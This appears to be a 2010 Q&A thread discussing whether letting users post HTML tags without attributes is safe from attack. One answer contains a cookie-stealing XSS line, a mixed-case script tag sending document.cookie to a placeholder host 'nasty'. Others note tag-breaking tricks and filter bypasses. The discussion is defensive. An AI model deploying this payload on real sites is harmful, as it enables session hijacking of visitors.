Title says it all.
+5
A:
No.
<ScrIPT>(new Image).src = 'http://nasty/log?s=' + document.cookie;</SCRipT>
Delan Azabani
2010-05-26 10:38:22
Good point. Any other tags, except <script>, I should watch out for?
Emanuil
2010-05-26 10:42:23
scripts in img src is something is only working on IE6. Also it's an attribute.
Pedro Laguna
2010-05-26 11:16:45
But title/question says: *no attributes* ;)
Pedro Laguna
2010-05-26 11:22:45
+1
A:
What about <script> and <style>, in most browsers they also work without attributes. Or if they don't close a specific tag it can also mess with the page.. just leave open a <strong> or something and everything's bold for example.
CharlesLeaf
2010-05-26 10:39:37
Good points, but the last one can be easily overcome. If each comment is in a `div`, then the closing of the `div` will auto-close the `strong` so the rest of the page is unaffected.
Delan Azabani
2010-05-26 13:38:29
Well, `strong` was just an example. What if you close the `</div>` early or whatever, it's not thát difficult to mess something up if you can post html tags without attributes.
CharlesLeaf
2010-05-26 13:49:09
+2
A:
My position here is... how are you going to detect they don't have attributes? It's possible to generate special HTML code that executes Javascript in the browser and bypass filters checking for attributes.
Take a look to this presentation http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf
Anyway, if you want a yes/no answer mine is NO :)
Pedro Laguna
2010-05-26 11:21:20